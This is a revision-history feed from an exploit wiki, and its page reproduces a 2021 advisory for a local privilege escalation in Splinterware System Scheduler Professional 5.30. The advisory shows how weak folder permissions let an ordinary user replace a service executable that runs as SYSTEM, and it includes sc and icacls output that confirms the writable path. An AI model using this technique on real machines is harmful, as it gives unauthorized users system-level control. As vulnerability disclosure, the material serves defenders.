https://pwnwiki.com/index.php?action=history&feed=atom&title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9ESplinterware System Scheduler Professional 5.30 特權提升漏洞 - Revision history2026-04-10T08:16:18ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&diff=2840&oldid=prevPwnwiki: Created page with "==EXP== <pre> # Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage..."2021-05-13T00:49:45Z<p>Created page with "==EXP== <pre> # Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation<br />
# Date: 2021-05-11<br />
# Exploit Author: Andrea Intilangelo<br />
# Vendor Homepage: https://www.splinterware.com<br />
# Software Link: https://www.splinterware.com/download/ssproeval.exe<br />
# Version: 5.30 Professional<br />
# Tested on: Windows 10 Pro 20H2 x64<br />
<br />
System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting<br />
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with<br />
elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;<br />
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one<br />
will be executed after a short while.<br />
<br />
C:\Users\test>sc qc WindowsScheduler<br />
[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br />
<br />
NOME_SERVIZIO: WindowsScheduler<br />
TIPO : 10 WIN32_OWN_PROCESS<br />
TIPO_AVVIO : 2 AUTO_START<br />
CONTROLLO_ERRORE : 0 IGNORE<br />
NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe<br />
GRUPPO_ORDINE_CARICAMENTO :<br />
TAG : 0<br />
NOME_VISUALIZZATO : System Scheduler Service<br />
DIPENDENZE :<br />
SERVICE_START_NAME : LocalSystem<br />
<br />
C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\<br />
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)<br />
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)<br />
NT SERVICE\TrustedInstaller:(I)(F)<br />
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)<br />
NT AUTHORITY\SYSTEM:(I)(F)<br />
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)<br />
BUILTIN\Administrators:(I)(F)<br />
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br />
BUILTIN\Users:(I)(RX)<br />
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)<br />
CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br />
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)<br />
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)<br />
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)<br />
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)<br />
<br />
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file<br />
<br />
C:\Users\test><br />
</pre></div>Pwnwiki